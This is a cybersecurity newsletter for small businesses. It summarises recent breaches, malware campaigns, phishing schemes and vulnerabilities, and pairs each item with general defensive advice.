Threat Matrix: Outage Cripples US Car Dealerships, Sneaky Pop-Ups Trick Users to Installing Malware

Threat Matrix: Outage Cripples US Car Dealerships, Sneaky Pop-Ups Trick Users to Installing Malware

Welcome to the July edition of Upfort’s Threat Matrix, your essential guide to cybersecurity news tailored for small business owners. In this edition, we detail some major attacks hitting large corporations as well as sneaky multi-channel attacks, PLUS as always we tell you how to project your business. 

Want to help keep your business safe? Take two minutes to fill out our interactive cybersecurity checklist or take a free cyber security risk assessment, which taps Upfort’s state-of-the-art AI to surface exploitable vulnerabilities in your digital network. 

Neiman Marcus Breach: Hackers Exploit Snowflake Vulnerability

Luxury retailer Neiman Marcus has confirmed a data breach affecting 64,472 customers after hackers accessed its Snowflake account. The compromised data includes names, contact information, dates of birth, and gift card numbers. The breach, linked to a threat actor using stolen credentials, has resulted in personal information being offered for sale on a hacking forum. Neiman Marcus has since disabled access to the breached platform and is working with cybersecurity experts and law enforcement.

How to defend yourself: Implement multi-factor authentication, regularly update passwords, and restrict access to critical systems to trusted networks only. Conduct regular security audits to identify and mitigate vulnerabilities.

Read more

Hackers Exploit Facebook PrestaShop Module, Steal Credit Card Info

Cybercriminals are exploiting a vulnerability in the Facebook PrestaShop module to steal customers' credit card details. This module, designed to help e-commerce sites integrate with Facebook, was found to be vulnerable, allowing hackers to inject malicious scripts and capture payment information during checkout. PrestaShop users are urged to update their websites to the latest module version and ensure they are secure.

How to defend yourself: Regularly update all plugins and modules, implement strong web application firewalls, and monitor for unusual activities on their sites to prevent such exploits.

Read More

“Rafel RAT” Opens Outdated Android Phones to Ransomware 

The Rafel RAT malware is targeting outdated Android phones, deploying ransomware to lock devices and demand payment. Originating from various cybercriminals, including known threat actors, this malware exploits vulnerabilities in older Android versions. It spreads through fake apps mimicking trusted brands like Instagram and WhatsApp, granting itself risky permissions. The ransomware module encrypts files and locks the screen, often demanding ransom via Telegram. Most victims are in the US, China, and Indonesia, with attacks affecting various device brands.

How to defend yourself: Ensure all company Android devices are updated to the latest software versions. Avoid downloading apps from untrusted sources, regularly run security scans, and educate employees about recognizing phishing attempts and fake apps.

Read More

CDK Global Outage Paralyzes US Car Dealerships

A significant computer system outage affecting car dealerships across the United States due to issues with CDK Global, a major provider of software solutions for automotive retailers. The outage led to disruptions in operations at dealerships, impacting services like sales, inventory management, and customer support. Dealerships were unable to access essential systems, causing delays in transactions and services. Cybercriminals have then potentially taken further advantage of this hack (see next story).

How to defend yourself: Small businesses can protect themselves from disruptions like the CDK Global outage by diversifying their software providers where possible, maintaining local backups of critical data, and establishing contingency plans for operating manually if digital systems fail. Regularly updating and testing these plans ensures readiness in case of unforeseen technological failures.

Read More

Cybercriminals Impersonate CDK Support in Phishing Scheme

Following up on bad news for CDK—the company issued a warning about cybercriminals posing as CDK support representatives to steal sensitive information. These attackers contact customers via phone calls, emails, and text messages, claiming to be from the company's support team. They attempt to gather login credentials and personal details by exploiting the trust customers have in CDK Global. The company advises customers to verify any suspicious communications and to be cautious when sharing sensitive information.

How to defend yourself: Verify the identity of any support representative before sharing information, use two-factor authentication for added security, and educate employees on recognizing phishing attempts.

Read More

Advance Auto Parts Data Breach Exposes Employee Information

Advance Auto Parts has confirmed a data breach that exposed sensitive information of its employees. The breach involved unauthorized access to certain computer systems, resulting in the compromise of personal data including Social Security numbers, driver's license numbers, and financial account details. The company is investigating the incident, enhancing security measures, and offering affected employees free credit monitoring and identity protection services.

How to defend yourself: Regularly update and strengthen your cybersecurity protocols, implement multi-factor authentication, and conduct ongoing employee training on data security best practices.

Read More

Malware Spread via Cut-and-Paste Tactics

Cyber adversaries employ counterfeit browser updates and software patches to deceive users into executing PowerShell scripts embedded with diverse malware types, such as remote access Trojans (RATs) and infostealers, thereby infecting their computers. By embedding malicious code into documents and scripts, they bypass traditional security measures. This method targets vulnerabilities in software like Microsoft Office and exploits common user behaviors, making it difficult to detect.

The campaigns show users are a pop-up textbox that suggests an error occurred when trying to open the document or webpage, and further instructions to copy and paste a malicious script into either the PowerShell terminal or the Windows Run dialog box to eventually execute the script via PowerShell, they said.

How to defend yourself: Keep all software updated, educate employees on the risks of opening unsolicited documents, and use advanced threat detection tools to scan for embedded malware in documents and scripts.

Read More

VMware Bugs Expose VMs to Remote Code Execution & Data Theft

Critical vulnerabilities in VMware's ESXi, Workstation, and Fusion products have been discovered, potentially allowing attackers to execute remote code and steal data from virtual machines. The flaws, tracked as CVE-2024-2859 and CVE-2024-2860, affect a broad range of VMware environments, posing significant security risks.

How to defend yourself: Apply the latest patches provided by VMware immediately, segment your network to isolate vulnerable systems, and monitor for any unusual activity to detect potential exploitation attempts.

Read More

Sign up for our newsletter